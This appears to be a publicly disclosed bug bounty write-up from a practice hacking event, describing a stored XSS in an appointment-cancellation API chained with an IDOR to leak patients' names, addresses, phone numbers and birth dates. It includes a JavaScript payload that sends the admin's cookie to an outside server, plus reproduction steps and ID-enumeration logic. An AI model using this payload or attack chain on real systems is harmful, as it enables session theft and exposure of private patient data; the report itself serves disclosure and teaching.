FirstBlood-#83 — Leaking PII data of users who have appointments using stored XSS and IDOR
This report has been reviewed and accepted as a valid vulnerability on FirstBlood!
On 2021-05-10, xnl-h4ck3r reported:
A stored XSS vulnerability exists in the manage appointments API /api/ma.php. An attacker can make an appointment, and then subsequently cancel it, but add the message parameter with an XSS payload that will fire on the admin cancellation page /drpanel/cancelled.php. This can leak the admin's drps cookie value.
This cookie can then be used to make an authorised GET request to /drpanel/drapi/query.php with the aptid parameter in the query string. An IDOR exists on this parameter that allows an attacker to enumerate the ID and therefore leak personal information for each user that has an appointment. The value of aptid takes the format 5691??19, where ?? is an even number starting at 02, 04, 06, etc. for each appointment booked. This endpoint will then reveal the Name, Address, Telephone and DOB of the user.
User data of ALL patients can also be leaked using the leaked cookie value in a POST request to /drpanel/drapi/qp.php and post parameter of
Steps to Reproduce
- Book an appointment on /book-appointment.html and make a note of the Appointment ID that is given, e.g.
- Go to /yourappointments.php, enter your Appointment ID and click Retrieve Appointment
- Run traffic through Burp proxy
- Click CANCEL APPOINTMENT button.
- Go to the last POST to /api/ma.php in Burp history and send to Repeater.
- NOTE: ALTHOUGH THE APPOINTMENT HAS BEEN CANCELLED, YOU CAN STILL USE THE APPOINTMENT ID IN THE API
- Now add the following post parameter
This is a Base64 encoding of
var x=new XMLHttpRequest();x.open('GET','//xn1.uk/c=' + document.cookie);x.send();
- Send the Request
- Now log in as an administrator and visit endpoint
- Observe the XSS payload firing and sending the value of the admins cookie to my server:
- Make a GET request to
???? is enumerated by adding 137 to the previous value each time.
- Observe the user data returned for each appointment:
- Make a POST request to /drpanel/drapi/qp.php using the admin's cookie, and providing a post parameter of
- Observe the response containing PII data of ALL patients:
The impact of this vulnerability is that an attacker could steal the admin's drps cookie, then enumerate the aptid to leak the personal data of users with appointments, or make a query to see ALL patients' PII.
This report has been publicly disclosed for everyone to view
FirstBlood ID: 8
Vulnerability Type: Stored XSS
When cancelling an appointment, an attacker can add a malicious XSS payload that will execute against administrators/doctors
Respect Earnt: 2000000
is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.